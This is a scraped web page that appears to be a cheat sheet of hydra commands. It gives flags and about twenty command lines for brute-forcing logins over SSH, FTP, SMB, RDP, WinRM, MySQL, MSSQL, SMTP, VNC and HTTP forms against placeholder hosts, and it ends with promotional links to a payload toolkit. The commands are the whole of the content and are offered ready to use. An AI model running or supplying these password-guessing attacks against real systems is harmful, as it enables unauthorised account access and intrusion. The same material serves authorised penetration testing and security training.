$loading...
Complete hydra reference for brute-forcing SSH, FTP, HTTP forms, SMB, RDP, and other protocols. (26 payloads)
-l admin-L usernames.txt-p password123-P /usr/share/wordlists/rockyou.txt-C creds.txt-t 16-f-v-V-s 2222hydra -l root -P wordlist.txt ssh://10.10.10.10hydra -l admin -P wordlist.txt ftp://10.10.10.10hydra -l admin -P wordlist.txt smb://10.10.10.10hydra -l administrator -P wordlist.txt rdp://10.10.10.10hydra -l admin -P wordlist.txt 10.10.10.10 winrmhydra -l admin -P wordlist.txt 10.10.10.10 mysqlhydra -l admin -P wordlist.txt 10.10.10.10 mssqlhydra -l admin -P wordlist.txt smtp://10.10.10.10hydra -l root -P wordlist.txt 10.10.10.10 vnchydra -l admin -P wordlist.txt 10.10.10.10 http-post-form "/login:username=^USER^&password=^PASS^:F=Invalid credentials"hydra -l admin -P wordlist.txt 10.10.10.10 http-post-form "/login:username=^USER^&password=^PASS^:S=Welcome"hydra -l admin -P wordlist.txt 10.10.10.10 http-get-form "/login:user=^USER^&pass=^PASS^:F=error"hydra -l admin -P wordlist.txt 10.10.10.10 http-post-form "/login:user=^USER^&pass=^PASS^:F=Invalid:H=Cookie\: PHPSESSID=abc123"hydra -l admin -P wordlist.txt -s 8080 10.10.10.10 http-post-form "/login:user=^USER^&pass=^PASS^:F=error"hydra -l admin -P wordlist.txt https-post-form "target.com/login:user=^USER^&pass=^PASS^:F=error"hydra -l admin -P wordlist.txt -u https://target.com http-post-form "/login:user=^USER^&pass=^PASS^:F=error"Level up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides